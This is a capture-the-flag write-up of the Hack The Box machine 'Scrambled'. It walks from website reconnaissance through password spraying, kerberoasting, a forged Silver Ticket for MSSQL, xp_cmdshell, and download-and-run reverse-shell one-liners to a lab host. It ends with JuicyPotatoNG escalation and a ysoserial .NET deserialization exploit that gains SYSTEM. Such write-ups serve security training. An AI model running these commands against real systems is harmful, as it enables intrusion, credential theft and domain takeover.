# Scrambled - HTB

[[_TOC_]]

## Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Scrambled was a fun medium-rated machine created by [@VbScrub](https://twitter.com/VbScrub)

Initially, we had to explore the website to find that NTLM authentication was disabled. We also found a potential username and password there.  
Since NTLM authentication was disabled, we had to use kerberos authentication instead.  
For the next step, we had to kerberoast an account and find another pair of credentials.  
This cracked account turned out to be a service account associated with the SQL service, and we had to perform a Silver Ticket Attack.  
Next, we could get a shell with `xp_cmdshell`, and use `JuicyPotatoNG` to get shell as Administrator (`xp_cmdshell` was unintentional, and the service account had `SeImpersonatePrivilege`)  
For the intended route, we had to find another pair of credentials from the database and use those to access the IT SMB share, where we found the executable running on port 4411 and exploited a deserialization vulnerability in it.

## Initial Recon

```console
opcode@parrot$ sudo nmap -v -p- 10.10.11.168
Nmap scan report for 10.10.11.168
Host is up (0.25s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4411/tcp  open  found
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49682/tcp open  unknown
49733/tcp open  unknown
58437/tcp open  unknown
```

```console
opcode@parrot$ sudo nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49669,49670,49682,49733,58437 10.10.11.168
Nmap scan report for 10.10.11.168
Host is up (0.24s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-14 18:25:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
|_ssl-date: 2022-06-14T18:28:34+00:00; +3s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-14T18:28:33+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-14T05:55:32
|_Not valid after:  2052-06-14T05:55:32
|_ssl-date: 2022-06-14T18:28:34+00:00; +3s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-14T18:28:34+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-14T18:28:33+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49733/tcp open  msrpc         Microsoft Windows RPC
58437/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2022-06-14T18:27:57
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
```

Since we have DNS, kerberos and LDAP ports here, we are likely looking at a Domain Controller.

SSL cert on LDAP tells us the domain name, so add them to `/etc/hosts`:
```
10.10.11.168 scrm.local DC1.scrm.local
```

## Exploring the website

On port 80, we have a website hosted with IIS.

![1](images/1.png)

On the "IT Services" page, we have this notification:

![2](images/2.png)

NTLM authentication has been disabled; that's intriguing.  

On the "Contact IT Support" page, there is an image:

![3](images/3.jpg)

It leaks the username `ksimpson`  
Running `exiftool` on this image leaks another username `VbScrub`

On the "Sales Orders App Troubleshooting" page, we have another image:

![4](images/4.png)

It implies that an unusual service is running on port 4411, perhaps internally. `nmap` says it is exposed.

And finally, on the "Password Resets" page, we have another clue:

![5](images/5.png)

A username could be the password itself, and we would have to test for those.

## SMB share

We can add the obtained usernames to `users.txt` and run kerbrute.  
Before using any kerberos tools, we should sync our system time to the box:
```console
opcode@parrot$ sudo ntpdate scrm.local
```

Now, let's run `kerbrute` (https://github.com/ropnop/kerbrute) `userenum` command to validate if these users exist:
```console
opcode@parrot$ ./kerbrute userenum ~/users.txt --dc 10.10.11.168 -d scrm.local
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/23/22 - Ronnie Flathers @ropnop

2022/06/15 18:52:19 >  Using KDC(s):
2022/06/15 18:52:19 >  	10.10.11.168:88

2022/06/15 18:52:19 >  [+] VALID USERNAME:	 ksimpson@scrm.local
2022/06/15 18:52:19 >  Done! Tested 2 usernames (1 valid) in 0.089 seconds
```

Now, let's test if the username is the password itself
```console
opcode@parrot$ ./kerbrute passwordspray ~/users.txt --dc 10.10.11.168 -d scrm.local 'ksimpson'
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/23/22 - Ronnie Flathers @ropnop

2022/06/15 18:53:09 >  Using KDC(s):
2022/06/15 18:53:09 >  	10.10.11.168:88

2022/06/15 18:53:09 >  [+] VALID LOGIN:	 ksimpson@scrm.local:ksimpson
2022/06/15 18:53:09 >  Done! Tested 2 logins (1 successes) in 0.364 seconds
```

Hence `ksimpson:ksimpson` is a valid pair of credentials.  
Now, let's use these on a service.

Exposed ports 135 and 445 imply SMB is available.  
But we cannot access SMB share through usual means, likely because NTLM authentication is disabled.  
`smbclient.py` from `impacket` supports kerberos authentication, and we can use that instead.

First, we can request a user TGT using `getST.py`:
```console
opcode@parrot$ getTGT.py scrm.local/ksimpson:ksimpson
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Saving ticket in ksimpson.ccache
```

Now, we can access SMB share with `smbclient.py`:
```console
opcode@parrot$ export KRB5CCNAME=ksimpson.ccache
opcode@parrot$ smbclient.py -no-pass -k scrm.local/ksimpson@dc1.scrm.local
```

```console
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
```
There are some non-default shares, but we can only access `Public`:
```console
# use Public
# ls
drw-rw-rw-          0  Fri Nov  5 03:53:19 2021 .
drw-rw-rw-          0  Fri Nov  5 03:53:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 23:15:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
```

There are two important pieces in the PDF which should be relevant to us:  
**Change:** As the attacker used something known as "NTLM relaying", we have disabled NTLM authentication across the entire network.  
**Change:** The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators.

## Kerberoasting

Next, I tried to get a shell as `ksimpson`, but I couldn't.
We can authenticate to LDAP through kerberos, but it seems that the user `ksimpson` cannot pull any information.

Since we have a valid set of credentials, we can attempt to kerberoast it:
```console
opcode@parrot$ getTGT.py scrm.local/ksimpson:ksimpson
opcode@parrot$ chmod go-r ksimpson.ccache
opcode@parrot$ export KRB5CCNAME=ksimpson.ccache
opcode@parrot$ GetUserSPNs.py -request -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -k -no-pass scrm.local/ksimpson -outputfile hashes.krbr
```

Now that we have the hash, we can attempt to crack it with `john`:
```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.krbr
```
It soon cracks to `Pegasus60`, and it is for the user `sqlsvc`

## Silver Ticket Attack

`sqlsvc` is likely a service account associated with the SQL service  
In that case, we should be able to perform a Silver Ticket Attack to forge a ticket and trick this SQL service into acknowledging us as the Administrator

This video from the box author does a great job of explaining the attack:
https://www.youtube.com/watch?v=_nJ-b1UFDVM

First, we need to get the domain SID of the target domain.  
Since LDAP is acting weird, (I guess the DNS is configured weirdly) this step is slightly involved.

We need to install `heimdal-clients`
```
sudo apt install heimdal-clients
```
Also:
```
sudo apt install libsasl2-modules-gssapi-mit
```

Now, we want `/etc/krb5.conf` to be:
```
[libdefaults]
        default_realm = SCRM.LOCAL

[realms]
        SCRM.LOCAL = {
		kdc = dc1.scrm.local
                admin_server = dc1.scrm.local
                default_domain = dc1.scrm.local
        }

[domain_realm]
        scrm.local = SCRM.LOCAL
        .scrm.local = SCRM.LOCAL
```

We also want `/etc/resolv.conf` to be:
```
domain scrm.local
search scrm.local
nameserver 10.10.11.168
```

Note that `klist` doesn't want the `ccache` to be readable by others or groups. We can fix the permissions with:
```console
opcode@parrot$ chmod go-r ksimpson.ccache
```

Alternatively, we could have requested the TGT with:
```console
opcode@parrot$ kinit ksimpson@SCRM.LOCAL
ksimpson@SCRM.LOCAL's Password: 
```

Now, we can get the User SID with `rpcclient` and strip off the last part to get the domain SID:
```console
opcode@parrot$ rpcclient -k dc1.scrm.local
rpcclient $> lookupnames Administrator
Administrator S-1-5-21-2743207045-1827831105-2542523200-500 (User: 1)
```

`S-1-5-21-2743207045-1827831105-2542523200` is our domain SID.

Next, we want the NTHash of the password:
```console
opcode@parrot$ python3 -c "print(__import__('binascii').hexlify(__import__('hashlib').new('md4', 'Pegasus60'.encode('utf-16le')).digest()))"
b'b999a16500b87d17ec7f2e2a68778f05'
```

Hence, the NT hash is `b999a16500b87d17ec7f2e2a68778f05`

Next, we can get our Silver Ticket with `ticketer.py`:
```console
opcode@parrot$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local Administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```

We can use this ticket to access the MSSQL server as Administrator.

## Credentials in MSSQL database

```console
opcode@parrot$ export KRB5CCNAME=Administrator.ccache
opcode@parrot$ mssqlclient.py dc1.scrm.local -k -no-pass
```

We can verify that we have admin privileges:
```console
SQL> select suser_name()
------------------------------------------
SCRM\administrator                                                              
```

We can look at the databases:
```console
SQL> SELECT Name from sys.Databases
Name
------------------------------------------   
master
tempdb
model
msdb
ScrambleHR
```

ScrambleHR is the one database that got compromised before
```console
SQL> USE ScrambleHR
```
We can look at the tables:
```console
SQL> SELECT name FROM ScrambleHR..sysobjects WHERE xtype = 'U'
name
------------------------------------------   
Employees
UserImport
Timesheets
```

The UserImport table contains a pair of credentials:
```console
SQL> SELECT * from UserImport
LdapUser    LdapPwd              LdapDomain    RefreshInterval   IncludeGroups
---------   ------------------   -----------   ---------------   -------------
MiscSvc     ScrambledEggs9900    scrm.local                 90               0
```

## `xp_cmdshell`

`xp_cmdshell` can be used to spawn a windows command shell and execute commands through this MSSQL client.  
It is usually disabled for obvious reasons, but we have Administrator privileges and we can enable it:
```console
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
output
------------------------------------------   
scrm\sqlsvc                                                                        
```

We can now use `Invoke-PowerShellTcpOneLine.ps1` from https://github.com/samratashok/nishang/tree/master/Shells to get a shell as `sqlsvc`
```console
SQL> xp_cmdshell "powershell -c iex( iwr http://10.10.14.14:8000/Invoke-PowerShellTcpOneLine.ps1 -UseBasicParsing )"
```

`Get-MpComputerStatus` tells us that Windows Defender is not running and the protections are disabled.  
So, we can upgrade to ConPtyShell for convenience. Start a local listener with:
```console
opcode@parrot$ stty raw -echo; (stty size; cat) | nc -lvnp 9001
```

Now, we can get a comfortable shell with:
```console
PS C:\> IEX(IWR http://10.10.14.14:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing)
PS C:\> Invoke-ConPtyShell 10.10.14.14 9001
```

## Unintended root with SeImpersonatePrivilege

```console
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   

============================= ========================================= ========

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

We have the `SeImpersonatePrivilege` enabled. We can use it to get an Administrator shell with JuicyPotatoNG (https://github.com/antonioCoco/JuicyPotatoNG) quickly.

```console
PS C:\Temp> wget 10.10.14.14:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> .\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c powershell -c iex( iwr http://10.10.14.14:8000/Invoke-PowerShellTcpOneLine.ps1 -UseBasicParsing )"
```

And we get a shell:
```
PS C:\Windows\system32> whoami
nt authority\system
```

## Shell as `MiscSvc`

If we go down the intended route, the next step would be to get a shell as `MiscSvc`:
```console
PS C:\Temp> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
PS C:\Temp> $Cred = New-Object System.Management.Automation.PSCredential('scrm\MiscSvc', $SecPassword)
PS C:\Temp> New-PSSession -Credential $Cred | Enter-PSSession
```

We can now read the user flag on the Desktop.  
Next, we should be looking for the application running on port 4411:
```
PS C:\Users\miscsvc\Documents> netstat -ano | Select-String "4411" 
Proto  Local Address          Foreign Address        State           PID  
TCP    0.0.0.0:4411           0.0.0.0:0              LISTENING       3156   
```

This process has PID 3156
```
PS C:\Users\miscsvc\Documents> PowerShell Get-Process | Select-String "3156"
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    343      15    17532      19576              3156   0 ScrambleServer        
    168       9     3156       7944              5136   0 svchost
```

We don't have the privileges to use the `-IncludeUserName` parameter, but the Session ID of 0 indicates it is likely running as Administrator.

We cannot find its `Path` either. But looking around, we can find `C:\Program Files\ScrambleCorp`... although we cannot peek inside.

But with `SqlSvc`, we can access the `IT` share, which was inaccessible before.
```console
opcode@parrot$ getTGT.py scrm.local/miscsvc:ScrambledEggs9900
opcode@parrot$ export KRB5CCNAME=miscsvc.ccache
smbclient.py scrm.local/miscsvc@dc1.scrm.local -k -no-pass
```
Inside, we find an executable and a dll:
```console
# use IT
# cd Apps/Sales Order Client
# ls
drw-rw-rw-          0  Sat Nov  6 02:27:08 2021 .
drw-rw-rw-          0  Sat Nov  6 02:27:08 2021 ..
-rw-rw-rw-      86528  Sat Nov  6 02:27:08 2021 ScrambleClient.exe
-rw-rw-rw-      19456  Sat Nov  6 02:27:08 2021 ScrambleLib.dll
# get ScrambleClient.exe
# get ScrambleLib.dll
```

## Static and Dynamic Analysis of executable

```console
opcode@parrot$ file ScrambleClient.exe 
ScrambleClient.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
```

Since it is a Mono/.NET binary, we should be able to use DotPeek (https://www.jetbrains.com/decompiler/) to check out its source

The `ScrambleClient.exe` mostly has GUI things.  
The application logic is mainly in the `ScrambleLib.dll` file.

We have something interesting in the `ScrambleLib > ScrambleNetClient > Logon` function:
```cs
    public bool Logon(string Username, string Password)
    {
      try
      {
        if (string.Compare(Username, "scrmdev", true) == 0)
        {
          Log.Write("Developer logon bypass used");
          return true;
        }
        MD5 md5 = MD5.Create();
        byte[] bytes = Encoding.ASCII.GetBytes(Password);
        byte[] buffer = bytes;
        int length = bytes.Length;
        Convert.ToBase64String(md5.ComputeHash(buffer, 0, length));
        ScrambleNetResponse response = this.SendRequestAndGetResponse(new ScrambleNetRequest(ScrambleNetRequest.RequestType.AuthenticationRequest, Username + "|" + Password));
        switch (response.Type)
        {
          case ScrambleNetResponse.ResponseType.Success:
            Log.Write("Logon successful");
            return true;
          case ScrambleNetResponse.ResponseType.InvalidCredentials:
            Log.Write("Logon failed due to invalid credentials");
            return false;
          default:
            throw new ApplicationException(response.GetErrorDescription());
        }
      }
    }
```

It implies that using the username `scrmdev` bypasses authentication.

We can also dynamically analyze this executable with Wireshark in a windows VM.  
Make sure to connect to the VPN and add this line to `C:\Windows\System32\drivers\etc\hosts`:
```
10.10.11.168 scrm.local DC1.scrm.local
```

On my machine, I had to monitor the `OpenVPN TAP-Windows6` interface with Wireshark.  
Upon logging in with the username `scrmdev`, we immediately see this:

![6](images/6.png)

The application also has a "New Order" section, which allows us to upload new orders.

![7](images/7.png)

We need to look at this section in DotPeek.

In `ScrambleLib > ScrambleNetShared`, we have a list of constants:
```cs
  public class ScrambleNetShared
  {
    public const string CODE_ERROR_GENERIC = "ERROR_GENERAL";
    public const string CODE_SUCCESS = "SUCCESS";
    public const string CODE_BANNER = "SCRAMBLECORP_ORDERS_V1.0.3";
    public const string CODE_TIMEOUT = "SESSION_TIMED_OUT";
    public const string CODE_ERROR_SIZE_LIMIT = "ERROR_SIZE_LIMIT_EXCEEDED";
    public const string CODE_ERROR_UNKNOWN_COMMAND = "ERROR_UNKNOWN_COMMAND";
    public const string CODE_ERROR_ACCESSDENIED = "ERROR_ACCESS_DENIED";
    public const string CODE_ERROR_BAD_CREDS = "ERROR_INVALID_CREDENTIALS";
    public const string CODE_LIST_ORDERS = "LIST_ORDERS";
    public const string CODE_UPLOAD_ORDER = "UPLOAD_ORDER";
    public const string CODE_LOGON = "LOGON";
    public const string CODE_QUIT = "QUIT";
    public const int ServerPort = 4411;
    public const char MessagePartSeparator = ';';
    public const char ContentListSeparator = '|';
  }
```

Now, let us look at `ScrambleLib > ScrambleNetClient > UploadOrder`:
```cs
   public void UploadOrder(SalesOrder NewOrder)
    {
      try
      {
        Log.Write("Uploading new order with reference " + NewOrder.ReferenceNumber);
        string base64 = NewOrder.SerializeToBase64();
        Log.Write("Order serialized to base64: " + base64);
        ScrambleNetResponse response = this.SendRequestAndGetResponse(new ScrambleNetRequest(ScrambleNetRequest.RequestType.UploadOrder, base64));
        if (response.Type != ScrambleNetResponse.ResponseType.Success)
          throw new ApplicationException(response.GetErrorDescription());
        Log.Write("Upload successful");
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        Exception exception = ex;
        Log.Write("Error: " + exception.Message);
        throw exception;
      }
    }
```
This could potentially be spicy. Some data is being serialized.  
We need to find the part where it gets deserialized back.

## .NET Deserialization Exploit

In `ScrambleLib > SalesOrder > DeserializeFromBase64`, we have:
```cs
    public static SalesOrder DeserializeFromBase64(string Base64)
    {
      try
      {
        byte[] buffer = Convert.FromBase64String(Base64);
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        Log.Write("Binary formatter init successful");
        using (MemoryStream serializationStream = new MemoryStream(buffer))
          return (SalesOrder) binaryFormatter.Deserialize((Stream) serializationStream);
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        throw new ApplicationException("Error deserializing sales order: " + ex.Message);
      }
    }
```
`BinaryFormatter` is being used for deserialization; we certainly have RCE potential here.  
We could check out `SendRequestAndGetResponse` to see the exact format of requests, but we can also figure it out by seeing an "Upload Order" in Wireshark.  

![8](images/8.png)

The line of interest is:
```cs
string str = ScrambleNetRequest.GetCodeFromMessageType(Request.Type) + ";" + Request.Parameter + "\n";
```
We should be able to make a request with this format using netcat ourselves

All we need to do now is to generate a deserialization payload.  
YSoSerial.Net is a deserialization payload generator for a variety of .NET formatters. (https://github.com/pwntester/ysoserial.net). We can use it.

I pretty much copied most of the commands from https://0xdf.gitlab.io/2021/05/01/htb-sharp.html, and they worked.

We can first try to ping ourselves:
```console
PS D:\Opcode\HTB\ysoserial-1.35> .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c 'ping -c 2 10.10.14.14' > payload
```

```console
opcode@parrot$ dos2unix payload
opcode@parrot$ echo UPLOAD_ORDER\;$(cat payload) > final
```

Now, we can listen for ICMP packets with `tcpdump`:
```console
opcode@parrot$ sudo tcpdump -i tun0 icmp
```

Pulling the trigger:
```console
opcode@parrot$ cat final | nc scrm.local 4411
```
And it worked!

We can try to get a shell now:
```console
PS D:\Opcode\HTB\ysoserial-1.35> .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c iex( iwr http://10.10.14.14:8000/Invoke-PowerShellTcpOneLine.ps1 -UseBasicParsing )" > payload
```

```console
opcode@parrot$ dos2unix payload
opcode@parrot$ echo UPLOAD_ORDER\;$(cat payload) > final
opcode@parrot$ cat final | nc scrm.local 4411
```

And we get a shell:
```console
PS C:\Windows\system32> whoami
nt authority\system
```
